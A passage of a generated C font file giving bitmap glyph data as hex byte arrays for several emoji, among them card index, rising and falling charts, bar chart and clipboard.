0x0, 0x7, 0xe0, 0xf, 0xff, 0x80, 0x7, 0x1f,
0x80, 0x3, 0xf8, 0x3, 0xff, 0xc0, 0x1, 0xc7,
0xe0, 0x0, 0xfe, 0x0, 0x0, 0x70, 0x0, 0x71,
0xf8, 0x0, 0x3, 0x80, 0x0, 0x38, 0x0, 0x1c,
0x7e, 0x0, 0x0, 0xe0, 0x0, 0xc, 0x0, 0x7,
0x1f, 0x80, 0x0, 0x38, 0x0, 0x7, 0x0, 0x1,
0xc7, 0xe0, 0x0, 0xe, 0x0, 0x1, 0x80, 0x0,
0x71, 0xf8, 0x0, 0x3, 0x80, 0x0, 0xe0, 0x0,
0x1c, 0x7e, 0x0, 0x0, 0xe0, 0x0, 0x38, 0x0,
0x7, 0x1f, 0x80, 0x0, 0x38, 0x0, 0x1c, 0x0,
0x1, 0xc7, 0xe0, 0x0, 0xe, 0x0, 0x7, 0x0,
0x0, 0x71, 0xf8, 0x0, 0x3, 0x80, 0x1, 0xc0,
0x0, 0x1c, 0x7e, 0x0, 0x0, 0xe0, 0x0, 0x70,
0x0, 0x7, 0x1f, 0x80, 0x0, 0x38, 0x0, 0x38,
0x0, 0x1, 0xc7, 0xe0, 0x0, 0xe, 0x0, 0xe,
0x0, 0x0, 0x71, 0xf8, 0x0, 0x3, 0x80, 0x3,
0x81, 0xff, 0xfc, 0x7e, 0x0, 0x0, 0xe0, 0x0,
0xe0, 0x7f, 0xff, 0x1f, 0x80, 0x7, 0xff, 0x80,
0x38, 0x1f, 0xff, 0xc7, 0xe0, 0x1, 0xff, 0xe0,
0xe, 0x7, 0xff, 0xe1, 0xf8, 0x0, 0x7f, 0xf8,
0x3, 0x81, 0xff, 0xf0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xf8, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xfc, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xfe, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x1, 0xfe, 0x0, 0x7e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0x0, 0x1f, 0x80, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xc0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x1c, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4C7 "📇" */
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x3, 0x87, 0xfe, 0xf, 0xff, 0x83, 0x80,
0x0, 0x0, 0x1, 0xc3, 0xff, 0x7, 0xff, 0xc1,
0xc0, 0x0, 0x0, 0x0, 0xe1, 0xff, 0x83, 0xff,
0xe0, 0xe0, 0x0, 0x0, 0x0, 0x70, 0xff, 0xc0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x38, 0x7f,
0xe0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x1c,
0x3f, 0xf0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0xe, 0x1f, 0xf8, 0x3f, 0xf0, 0xe, 0x0, 0x0,
0x0, 0x7, 0xf, 0xfc, 0x1f, 0xf8, 0x7, 0x0,
0x0, 0x0, 0x3, 0x87, 0xfe, 0xf, 0xfc, 0x3,
0x80, 0x0, 0x0, 0x1, 0xc3, 0xff, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0xe1, 0xff, 0x80,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x70, 0xff,
0xc0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x3,
0xfc, 0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0,
0x7, 0xfe, 0x0, 0x0, 0x3f, 0x80, 0xf, 0xf8,
0x0, 0x7, 0x87, 0x0, 0x0, 0x0, 0x0, 0x7,
0x8e, 0x0, 0x7, 0x7, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc3, 0x80, 0x3, 0x83, 0xc0, 0x0, 0x0,
0x0, 0x1, 0xf1, 0xc0, 0x3, 0x83, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xf8, 0x70, 0x1, 0xc1, 0xf0,
0x8, 0x0, 0x0, 0x80, 0x7c, 0x38, 0x0, 0xe0,
0xf8, 0xe, 0x0, 0x0, 0xe0, 0x3e, 0x1c, 0x0,
0x70, 0x7c, 0x7, 0x0, 0x0, 0x70, 0x1f, 0xe,
0x0, 0x38, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0x87, 0x0, 0x1c, 0x1f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc3, 0x80, 0xe, 0xf, 0x80, 0xe0, 0x0,
0xe, 0x1, 0xe1, 0xc0, 0x7, 0x87, 0x80, 0x70,
0x0, 0x7, 0x0, 0x70, 0xe0, 0x1, 0xc7, 0x80,
0x10, 0x0, 0x1, 0x0, 0x3c, 0xe0, 0x0, 0xf3,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0,
0x3f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf0,
0x0, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7c, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x3, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf0, 0x3,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0xf0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc1, 0xe0, 0xf0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0xf8, 0xf8, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x3c, 0x78, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xf, 0x3c,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x7,
0xbc, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xc,
0x3, 0xfe, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0xff, 0x0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0x7f, 0x80, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3f, 0xc0, 0x3, 0x80,
0x0, 0x0, 0x0, 0xf, 0x0, 0x1f, 0xe0, 0x7,
0xc0, 0x0, 0x0, 0x0, 0x7, 0xc0, 0xf, 0xf0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x7,
0xf8, 0x7, 0xf0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x3, 0xfc, 0xf, 0xdf, 0xff, 0xff, 0xff, 0xff,
0xef, 0x83, 0xef, 0xf, 0xcf, 0xff, 0xff, 0xff,
0xff, 0xf3, 0xe1, 0xe7, 0x9f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf8, 0xf3, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xf8, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xf8, 0x3f,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf8,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x78, 0x0,
/* U+1F4C8 "📈" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x1, 0x80, 0x60, 0xc, 0x3, 0x0, 0x60,
0x1f, 0x0, 0x60, 0x18, 0x3, 0x0, 0xc0, 0x18,
0xf, 0xc0, 0x18, 0x6, 0x0, 0xc0, 0x30, 0x6,
0x7, 0xf0, 0x6, 0x1, 0x80, 0x30, 0xc, 0x1,
0x83, 0xfc, 0x1, 0x80, 0x60, 0xc, 0x3, 0x0,
0x60, 0xef, 0x0, 0x60, 0x18, 0x3, 0x0, 0xc0,
0x18, 0x73, 0xc0, 0x18, 0x6, 0x0, 0xc0, 0x30,
0x6, 0x3c, 0xf0, 0x6, 0x1, 0x80, 0x30, 0xc,
0x1, 0x9e, 0x3c, 0x1, 0x80, 0x60, 0xc, 0x3,
0x0, 0x67, 0xf, 0x0, 0x60, 0x18, 0x3, 0x0,
0xc0, 0x1b, 0x83, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x6, 0x1, 0x80, 0x30,
0xc, 0x1, 0xf0, 0x3c, 0x1, 0x80, 0x60, 0xc,
0x3, 0x0, 0x78, 0xf, 0x0, 0x60, 0x18, 0x3,
0x0, 0xc0, 0x1e, 0x3, 0xc0, 0x18, 0x6, 0x0,
0xc0, 0x30, 0xf, 0x0, 0xf0, 0x6, 0x1, 0x80,
0x30, 0xc, 0x3, 0x80, 0x3c, 0x1, 0x80, 0x60,
0xc, 0x3, 0x1, 0xe0, 0xf, 0x0, 0x60, 0x18,
0x3, 0x0, 0xc0, 0xf8, 0x3, 0xc0, 0x18, 0x6,
0x0, 0xc0, 0x30, 0x7e, 0x0, 0xf0, 0x6, 0x1,
0x80, 0x30, 0xc, 0x1d, 0x80, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x60,
0x18, 0x3, 0x0, 0xc7, 0x98, 0x3, 0xc0, 0x18,
0x6, 0x0, 0xc0, 0x33, 0xc6, 0x0, 0xf0, 0x6,
0x1, 0x80, 0x30, 0xc, 0xe1, 0x80, 0x3c, 0x1,
0x80, 0x60, 0xc, 0x3, 0x78, 0x60, 0xf, 0x0,
0x60, 0x18, 0x3, 0x0, 0xfc, 0x18, 0x3, 0xc0,
0x18, 0x6, 0x0, 0xc0, 0x3e, 0x6, 0x0, 0xf0,
0x6, 0x1, 0x80, 0x30, 0xf, 0x1, 0x80, 0x3c,
0x1, 0x80, 0x60, 0xc, 0x3, 0xc0, 0x60, 0xf,
0x0, 0x60, 0x18, 0x3, 0x1, 0xe0, 0x18, 0x3,
0xc0, 0x18, 0x6, 0x0, 0xc0, 0x70, 0x6, 0x0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x1, 0x80, 0x60, 0xc, 0x1f, 0x0, 0x60,
0xf, 0x0, 0x60, 0x18, 0x3, 0xf, 0xc0, 0x18,
0x3, 0xc0, 0x19, 0x6, 0x0, 0xc3, 0xb0, 0x6,
0x0, 0xf0, 0x6, 0xe1, 0x80, 0x31, 0xec, 0x1,
0x80, 0x3c, 0x1, 0xfc, 0x60, 0xc, 0xf3, 0x0,
0x60, 0xf, 0x0, 0x7f, 0x98, 0x3, 0x78, 0xc0,
0x18, 0x3, 0xc0, 0x1e, 0xf6, 0x0, 0xdc, 0x30,
0x6, 0x0, 0xf0, 0x7, 0x9f, 0x80, 0x3f, 0xc,
0x1, 0x80, 0x3c, 0x1, 0xc3, 0xe0, 0xf, 0x83,
0x0, 0x60, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x38, 0xf, 0x0, 0xe0,
0x30, 0x6, 0x0, 0xf0, 0xe, 0x1, 0xe0, 0x78,
0xc, 0x1, 0x80, 0x3c, 0x7, 0x80, 0x7c, 0x3c,
0x3, 0x0, 0x60, 0xf, 0x1, 0xe0, 0x1f, 0x8f,
0x0, 0xc0, 0x18, 0x3, 0xc0, 0xf8, 0x6, 0xf7,
0xc0, 0x30, 0x6, 0x0, 0xf0, 0x3e, 0x1, 0x9f,
0xf0, 0xc, 0x1, 0x80, 0x3c, 0x1d, 0x80, 0x63,
0xec, 0x3, 0x0, 0x60, 0xf, 0x7, 0x60, 0x18,
0x73, 0x0, 0xc0, 0x18, 0x3, 0xc3, 0x98, 0x6,
0xc, 0xc0, 0x30, 0x6, 0x0, 0xf1, 0xe6, 0x1,
0x80, 0x30, 0xc, 0x1, 0x80, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x3c, 0x60,
0x18, 0x3, 0x0, 0xc0, 0x18, 0x3, 0xce, 0x18,
0x6, 0x0, 0xc0, 0x30, 0x6, 0x0, 0xf7, 0x6,
0x1, 0x80, 0x30, 0xc, 0x1, 0x80, 0x3d, 0xc1,
0x80, 0x60, 0xc, 0x3, 0x0, 0x60, 0xf, 0xe0,
0x60, 0x18, 0x3, 0x0, 0xc0, 0x18, 0x3, 0xf8,
0x18, 0x6, 0x0, 0xc0, 0x30, 0x6, 0x0, 0xfc,
0x6, 0x1, 0x80, 0x30, 0xc, 0x1, 0x80, 0x3f,
0x1, 0x80, 0x60, 0xc, 0x3, 0x0, 0x60, 0xf,
0x80, 0x60, 0x18, 0x3, 0x0, 0xc0, 0x18, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0,
/* U+1F4C9 "📉" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x1, 0x80, 0x60, 0xc, 0x3, 0x0, 0x60,
0xf, 0xc0, 0x60, 0x18, 0x3, 0x0, 0xc0, 0x18,
0x3, 0xf0, 0x18, 0x6, 0x0, 0xc0, 0x30, 0x6,
0x0, 0xfe, 0x6, 0x1, 0x80, 0x30, 0xc, 0x1,
0x80, 0x3f, 0x81, 0x80, 0x60, 0xc, 0x3, 0x0,
0x60, 0xf, 0x70, 0x60, 0x18, 0x3, 0x0, 0xc0,
0x18, 0x3, 0xdc, 0x18, 0x6, 0x0, 0xc0, 0x30,
0x6, 0x0, 0xf3, 0x86, 0x1, 0x80, 0x30, 0xc,
0x1, 0x80, 0x3c, 0xe1, 0x80, 0x60, 0xc, 0x3,
0x0, 0x60, 0xf, 0x1c, 0x60, 0x18, 0x3, 0x0,
0xc0, 0x18, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0xe6, 0x1, 0x80, 0x30,
0xc, 0x1, 0x80, 0x3c, 0x39, 0x80, 0x60, 0x8c,
0x3, 0x0, 0x60, 0xf, 0x7, 0x60, 0x18, 0x73,
0x0, 0xc0, 0x18, 0x3, 0xc1, 0xd8, 0x6, 0x3e,
0xc0, 0x30, 0x6, 0x0, 0xf0, 0x3e, 0x1, 0x9f,
0xf0, 0xc, 0x1, 0x80, 0x3c, 0xf, 0x80, 0x6f,
0x7c, 0x3, 0x0, 0x60, 0xf, 0x1, 0xe0, 0x1f,
0x8f, 0x0, 0xc0, 0x18, 0x3, 0xc0, 0x78, 0x7,
0xc3, 0xc0, 0x30, 0x6, 0x0, 0xf0, 0xe, 0x3,
0xe0, 0x78, 0xc, 0x1, 0x80, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x70,
0xf8, 0x3, 0xc0, 0xc0, 0x18, 0x3, 0xc0, 0x1e,
0x7e, 0x0, 0xf8, 0x30, 0x6, 0x0, 0xf0, 0x7,
0xbf, 0x80, 0x3f, 0xc, 0x1, 0x80, 0x3c, 0x1,
0xff, 0x60, 0xd, 0xc3, 0x0, 0x60, 0xf, 0x0,
0x7f, 0x98, 0x3, 0x38, 0xc0, 0x18, 0x3, 0xc0,
0x1f, 0xc6, 0x0, 0xcf, 0x30, 0x6, 0x0, 0xf0,
0x6, 0xe1, 0x80, 0x31, 0xcc, 0x1, 0x80, 0x3c,
0x1, 0xb0, 0x60, 0xc, 0x3b, 0x0, 0x60, 0xf,
0x0, 0x60, 0x18, 0x3, 0x7, 0xc0, 0x18, 0x3,
0xc0, 0x18, 0x6, 0x0, 0xc1, 0xf0, 0x6, 0x0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x1, 0x80, 0x60, 0xc, 0x7, 0x0, 0x60,
0xf, 0x0, 0x60, 0x18, 0x3, 0x1, 0xe0, 0x18,
0x3, 0xc0, 0x18, 0x6, 0x0, 0xc0, 0x3c, 0x6,
0x0, 0xf0, 0x6, 0x1, 0x80, 0x30, 0xf, 0x1,
0x80, 0x3c, 0x1, 0x80, 0x60, 0xc, 0x3, 0xe0,
0x60, 0xf, 0x0, 0x60, 0x18, 0x3, 0x0, 0xfc,
0x18, 0x3, 0xc0, 0x18, 0x6, 0x0, 0xc0, 0x37,
0x86, 0x0, 0xf0, 0x6, 0x1, 0x80, 0x30, 0xc,
0xe1, 0x80, 0x3c, 0x1, 0x80, 0x60, 0xc, 0x3,
0x1c, 0x60, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x18, 0x6, 0x0, 0xc0,
0x30, 0xe6, 0x0, 0xf0, 0x6, 0x1, 0x80, 0x30,
0xc, 0x1d, 0x80, 0x3c, 0x1, 0x80, 0x60, 0xc,
0x3, 0x3, 0xe0, 0xf, 0x0, 0x60, 0x18, 0x3,
0x0, 0xc0, 0xf8, 0x3, 0xc0, 0x18, 0x6, 0x0,
0xc0, 0x30, 0x1e, 0x0, 0xf0, 0x6, 0x1, 0x80,
0x30, 0xc, 0x3, 0x80, 0x3c, 0x1, 0x80, 0x60,
0xc, 0x3, 0x0, 0x70, 0xf, 0x0, 0x60, 0x18,
0x3, 0x0, 0xc0, 0x1e, 0x3, 0xc0, 0x18, 0x6,
0x0, 0xc0, 0x30, 0x7, 0x80, 0xf0, 0x6, 0x1,
0x80, 0x30, 0xc, 0x1, 0xf0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x60,
0x18, 0x3, 0x0, 0xc0, 0x1b, 0xc3, 0xc0, 0x18,
0x6, 0x0, 0xc0, 0x30, 0x6, 0x70, 0xf0, 0x6,
0x1, 0x80, 0x30, 0xc, 0x1, 0x8e, 0x3c, 0x1,
0x80, 0x60, 0xc, 0x3, 0x0, 0x63, 0xcf, 0x0,
0x60, 0x18, 0x3, 0x0, 0xc0, 0x18, 0x7b, 0xc0,
0x18, 0x6, 0x0, 0xc0, 0x30, 0x6, 0xe, 0xf0,
0x6, 0x1, 0x80, 0x30, 0xc, 0x1, 0x81, 0xfc,
0x1, 0x80, 0x60, 0xc, 0x3, 0x0, 0x60, 0x7f,
0x0, 0x60, 0x18, 0x3, 0x0, 0xc0, 0x18, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0,
/* U+1F4CA "📊" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0xc0, 0x3c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xf0, 0xf, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xfc, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xc0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xf0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xfc, 0x3, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xf0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xfc, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0x0, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xc0, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xf0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xfc, 0x3, 0xc0,
0x3f, 0xe0, 0x0, 0x0, 0x1, 0xff, 0x0, 0xf0,
0xf, 0xf8, 0x0, 0x0, 0x0, 0x7f, 0xc0, 0x3c,
0x3, 0xfe, 0x0, 0x0, 0x0, 0x1f, 0xf0, 0xf,
0x0, 0xff, 0x80, 0x0, 0x0, 0x7, 0xfc, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0xf, 0xf8, 0x0, 0x0, 0x0, 0x7f, 0xc0,
0x3c, 0x3, 0xfe, 0x0, 0x0, 0x0, 0x1f, 0xf0,
0xf, 0x0, 0xff, 0x80, 0x0, 0x0, 0x7, 0xfc,
0x3, 0xc0, 0x3f, 0xe0, 0x0, 0x0, 0x1, 0xff,
0x0, 0xf0, 0xf, 0xf8, 0x0, 0x0, 0x0, 0x7f,
0xc0, 0x3c, 0x3, 0xfe, 0x0, 0xff, 0x80, 0x1f,
0xf0, 0xf, 0x0, 0xff, 0x80, 0x3f, 0xe0, 0x7,
0xfc, 0x3, 0xc0, 0x3f, 0xe0, 0xf, 0xf8, 0x1,
0xff, 0x0, 0xf0, 0xf, 0xf8, 0x3, 0xfe, 0x0,
0x7f, 0xc0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x0, 0xff, 0x80, 0x3f, 0xe0,
0x7, 0xfc, 0x3, 0xc0, 0x3f, 0xe0, 0xf, 0xf8,
0x1, 0xff, 0x0, 0xf0, 0xf, 0xf8, 0x3, 0xfe,
0x0, 0x7f, 0xc0, 0x3c, 0x3, 0xfe, 0x0, 0xff,
0x80, 0x1f, 0xf0, 0xf, 0x0, 0xff, 0x80, 0x3f,
0xe0, 0x7, 0xfc, 0x3, 0xc0, 0x3f, 0xe0, 0xf,
0xf8, 0x1, 0xff, 0x0, 0xf0, 0xf, 0xf8, 0x3,
0xfe, 0x0, 0x7f, 0xc0, 0x3c, 0x3, 0xfe, 0x0,
0xff, 0x80, 0x1f, 0xf0, 0xf, 0x0, 0xff, 0x80,
0x3f, 0xe0, 0x7, 0xfc, 0x3, 0xc0, 0x3f, 0xe0,
0xf, 0xf8, 0x1, 0xff, 0x0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x3, 0xfe,
0x0, 0xff, 0x80, 0x1f, 0xf0, 0xf, 0x0, 0xff,
0x80, 0x3f, 0xe0, 0x7, 0xfc, 0x3, 0xc0, 0x3f,
0xe0, 0xf, 0xf8, 0x1, 0xff, 0x0, 0xf0, 0xf,
0xf8, 0x3, 0xfe, 0x0, 0x7f, 0xc0, 0x3c, 0x3,
0xfe, 0x0, 0xff, 0x80, 0x1f, 0xf0, 0xf, 0x0,
0xff, 0x80, 0x3f, 0xe0, 0x7, 0xfc, 0x3, 0xc0,
0x3f, 0xe0, 0xf, 0xf8, 0x1, 0xff, 0x0, 0xf0,
0xf, 0xf8, 0x3, 0xfe, 0x0, 0x7f, 0xc0, 0x3c,
0x3, 0xfe, 0x0, 0xff, 0x80, 0x1f, 0xf0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0,
/* U+1F4CB "📋" */
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x70,
0x0, 0x0, 0x0, 0x0, 0xc, 0x30, 0x0, 0x0,
0x0, 0x0, 0xc, 0x30, 0x0, 0x0, 0x0, 0x0,
0xe, 0x70, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xfc,
0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xe0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xf0, 0x0, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe0, 0x1f, 0xff, 0xff, 0xf8, 0x7,
0xe0, 0x1f, 0xff, 0xff, 0xf8, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x3f,
0xff, 0xff, 0xfc, 0x7, 0xe0, 0x3f, 0xff, 0xff,
0xfc, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x3f,
0xff, 0xff, 0xfc, 0x7, 0xe0, 0x3f, 0xff, 0xff,
0xfc, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x3f,
0xff, 0xff, 0xfc, 0x7, 0xe0, 0x3f, 0xff, 0xff,
0xfc, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x3f, 0xff, 0xff, 0xfc, 0x7, 0xe0, 0x3f,
0xff, 0xff, 0xfc, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x3f, 0xff, 0x0, 0x0, 0x7, 0xe0, 0x3f,
0xff, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
